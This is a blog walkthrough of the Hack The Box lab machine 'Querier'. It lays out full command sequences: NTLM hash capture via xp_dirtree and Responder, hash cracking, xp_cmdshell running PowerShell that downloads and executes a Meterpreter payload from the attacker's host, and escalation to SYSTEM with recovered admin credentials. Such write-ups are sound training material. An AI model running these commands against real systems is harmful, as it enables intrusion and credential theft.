HTB: Querier

Details

This machine is Querier from Hack The Box

Recon Phase

Start by doing some service discovery

root@kali:~# nmap -T4 -sV -p- 10.10.10.125
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 16:59 GMT
Nmap scan report for 10.10.10.125
Host is up (0.033s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server vNext tech preview 14.00.1000
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.60 seconds

Then run it again, but enabling some extra scripts

root@kali:~# nmap -T4 -sVC -p- 10.10.10.125
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 17:01 GMT
Nmap scan report for 10.10.10.125
Host is up (0.035s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server  14.00.1000.00
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-03-02T16:46:28
|_Not valid after:  2049-03-02T16:46:28
|_ssl-date: 2019-03-02T17:01:43+00:00; -1m02s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1m01s, deviation: 0s, median: -1m01s
| ms-sql-info:
|   10.10.10.125:1433:
|     Version:
|       name: Microsoft SQL Server
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server
|_    TCP port: 1433
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-03-02 17:01:48
|_  start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.24 seconds

Shell Hunting

So there are two web servers, one on port 5985 and one on port 47001, so I start with port 5985 at http://10.10.10.125:5985/

Screenshot 1

Then onto port 47001

Screenshot 2

Onto the potential smb

root@kali:~# smbmap -H 10.10.10.125
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.125...
[+] IP: 10.10.10.125:445    Name: 10.10.10.125
    Disk                                                    Permissions
    ----                                                    -----------
[!] Access Denied

Didn't get me anything, but I tried another method of checking this

root@kali:~# smbclient -L 10.10.10.125
Enter WORKGROUP\root's password:

So I just hit enter

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    Reports         Disk
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

This revealed a share called reports, so I attempted to mount it

root@kali:~# mkdir /tmp/mounted
root@kali:~# mount -v //10.10.10.125/Reports /tmp/mounted
Password for root@//10.10.10.125/Reports:

Then just hit enter again

mount.cifs kernel mount options: ip=10.10.10.125,unc=\\10.10.10.125\Reports,user=root,pass=********

I can check that out now

root@kali:/tmp/mounted# ls -la
drwxr-xr-x  2 root root     0 Jan 28 23:23  .
drwxrwxrwt 18 root root  4096 Mar  2 18:19  ..
-rwxr-xr-x  1 root root 12229 Jan 27 22:21 'Currency Volume Report.xlsm'

I opened it in office

Screenshot 3

Screenshot 4

With no content, I began to inspect the macros

Screenshot 5

This leaked creds for the database as

reporting:PcwTWTHRwryjc$c6

I used impacket's mysqlclient.py https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/mssqlclient.py in order to attempt to login

root@kali:~# python mssqlclient.py reporting:PcwTWTHRwryjc$c6@10.10.10.125
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[-] ERROR(QUERIER): Line 1: Login failed for user 'reporting'.

It didn't work, so I tried using windows auth for it

root@kali:~# python mssqlclient.py reporting:PcwTWTHRwryjc$c6@10.10.10.125 -windows-auth
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[-] ERROR(QUERIER): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

This had me stumped for a bit, but then I realised that the password contained a $ which would need to be escaped so bash didn't try to interpret it

root@kali:~# python mssqlclient.py reporting:PcwTWTHRwryjc\$c6@10.10.10.125 -windows-auth
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>

I was now into the SQL server, so I began to look around it

SQL> help
     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd

So I tried xp_cmdshell

SQL> xp_cmdshell whoami
[-] ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.

Not enabled, so I tried to enable it

SQL> enable_xp_cmdshell
[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(QUERIER): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.

I was missing the required privs, so I next tried to get a higher priv account by stealing some hashes, first testing if I could make it try to connect to me, using port 445 as that would be the port it connects to

root@kali:~# nc -nlvp 445
SQL> exec XP_DIRTREE '\\10.10.14.24\test'

And in the listener

connect to [10.10.14.24] from (UNKNOWN) [10.10.10.125] 49684
E�SMBrS�����"NT LM 0.12SMB 2.002SMB 2

So I got a connection, I'll run responder and try to steal an NTLM hash

root@kali:~# responder
SQL> exec XP_DIRTREE '\\10.10.14.24\test'

Back in responder

[SNIP]
[+] Listening for events...
[SMBv2] NTLMv2-SSP Client   : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMBv2] NTLMv2-SSP Hash     : mssql-svc::QUERIER:32eb8061c13a93bc:F991C4778ACF703DA5895869E46EE2A0:0101000000000000C0653150DE09D2015B5EBEB4221D293E000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002000000080030003000000000000000000000000030000010211019D67738EB25A486B4DD04915D3B347C41312A186015CD9D44395C2C5A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003400000000000000000000000000
[SMBv2] NTLMv2-SSP Client   : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : \gX
[SMBv2] NTLMv2-SSP Hash     : gX:::c93ee8688cfd97b1::
[SNIP]

This gave me

mssql-svc::QUERIER:32eb8061c13a93bc:F991C4778ACF703DA5895869E46EE2A0:0101000000000000C0653150DE09D2015B5EBEB4221D293E000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002000000080030003000000000000000000000000030000010211019D67738EB25A486B4DD04915D3B347C41312A186015CD9D44395C2C5A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003400000000000000000000000000
gX:::c93ee8688cfd97b1::

And put them into a file called crack.txt, then set john on them

root@kali:~# john ./crack.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
corporate568     (mssql-svc)
1g 0:00:00:02 DONE (2019-03-02 20:33) 0.3401g/s 3059Kp/s 3059Kc/s 3059KC/s correforenz..colty999
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

This gave me creds of

mssql-svc:corporate568

And connected back to it

root@kali:~# python mssqlclient.py mssql-svc:corporate568@10.10.10.125 -windows-auth
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>

Now maybe I could use xp_cmdshell

SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

Nice, so I'll try to use it

SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
querier\mssql-svc
NULL

So I have RCE, but need to get a shell out of it, I utilise phantom evasion https://github.com/oddcod3/Phantom-Evasion generate a meterpreter payload which I saved as jack.exe and moved it to /var/www/html

root@kali:~# mv jack.exe /var/www/html

And started up the webserver

root@kali:~# apache2ctl start

And setup to run the exe

SQL> xp_cmdshell powershell -Command "mkdir C:\tmp"
SQL> xp_cmdshell powershell -Command "Invoke-WebRequest -Uri "http://10.10.14.24/jack.exe" -OutFile C:\tmp\jack.exe"

Then double check it worked

SQL> xp_cmdshell powershell -Command "dir C:\tmp"
[SNIP]
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/2/2019  11:59 PM          21760 jack.exe
[SNIP]

And setup a meterpreter handler

root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 10.10.14.24
LHOST => 10.10.14.24
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.24:4444

And activated my payload

SQL> xp_cmdshell C:\tmp\jack.exe
[*] Sending stage (179779 bytes) to 10.10.10.125
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.125:49696) at 2019-03-03 00:25:22 +0000
meterpreter >
[*] 10.10.10.125 - Meterpreter session 1 closed.  Reason: Died

It popped, but instantly died, so I tried to run it again

SQL> xp_cmdshell C:\tmp\jack.exe
output
--------------------------------------------------------------------------------
Access is denied.
NULL

Seems to have been blocked, so I generated some new payloads and repeated the method to run them, and my 3rd attempt held

[*] Sending stage (179779 bytes) to 10.10.10.125
[*] Meterpreter session 3 opened (10.10.14.24:4444 -> 10.10.10.125:49700) at 2019-03-03 00:40:31 +0000
meterpreter >

So I wanted the user flag

meterpreter > pwd
C:\Windows\system32

Which was on the desktop for the mssql-svc user

meterpreter > dir
Listing: C:\Users\mssql-svc\Desktop
===================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-01-28 23:42:03 +0000  desktop.ini
100666/rw-rw-rw-  33    fil   2019-01-28 00:08:41 +0000  user.txt
meterpreter > cat user.txt
[REDACTED]

Hunting For System

Now I had user I could begin to try and get system, first dropping into a cmd

meterpreter > shell
Process 1584 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\mssql-svc\Desktop>

After a bit of manual digging and not coming up with anything useful I grabbed a script to help from https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc which I put onto the target in

C:\Users\mssql-svc\Documents\WindowsPowerShell\Modules\Privesc

And dropped into powershell to use it

C:\Users\mssql-svc\Desktop> powershell
PS C:\Users\mssql-svc\Documents\WindowsPowerShell\Modules> Import-Module Privesc

With the module imported I ran all checks

PS C:\Users\mssql-svc\Documents\WindowsPowerShell\Modules> Invoke-AllChecks
[SNIP]
Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group
            Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml

This gave me new creds for an admin account

Administrator:MyUnclesAreMarioAndLuigi!!1!

To get a shell with these I again used impacket, this time the psexec.py file

root@kali:~# python psexec.py Administrator:MyUnclesAreMarioAndLuigi\!\!1\!@10.10.10.125
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.125.....
[*] Found writable share ADMIN$
[*] Uploading file cMteuWAG.exe
[*] Opening SVCManager on 10.10.10.125.....
[*] Creating service sudA on 10.10.10.125.....
[*] Starting service sudA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

I had a new shell

C:\Windows\system32>whoami
nt authority\system

Time for the system flag

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is FE98-F373
 Directory of C:\Users\Administrator\Desktop
01/29/2019  12:04 AM    <DIR>          .
01/29/2019  12:04 AM    <DIR>          ..
01/28/2019  12:08 AM                33 root.txt
               1 File(s)             33 bytes
               2 Dir(s)   6,443,544,576 bytes free
C:\Users\Administrator\Desktop>type root.txt
[REDACTED]

And with that it was done

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.